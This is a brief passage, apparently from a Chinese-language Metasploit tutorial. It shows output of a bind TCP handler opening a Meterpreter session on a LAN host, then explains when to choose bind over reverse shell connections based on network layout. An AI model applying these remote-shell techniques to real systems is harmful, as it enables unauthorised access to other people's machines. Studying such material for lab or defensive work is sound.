[*] Started bind TCP handler against 192.168.4.199:5555 [*] Sending stage (206403 bytes) to 192.168.4.199 [*] Meterpreter session 2 opened (192.168.4.146:41015 -> 192.168.4.199:5555) at 2020-04-21 05:05:42 -0400 meterpreter >
其余的操作都和反向連接方式是一樣的。
正向和反向方式的選擇主要是看網絡的結構,如果我們的攻擊機在公網(靶機可訪問),而靶機在局域網,則可以使用反向連接方式。如果靶機在公網,則可以使用正向連接。
===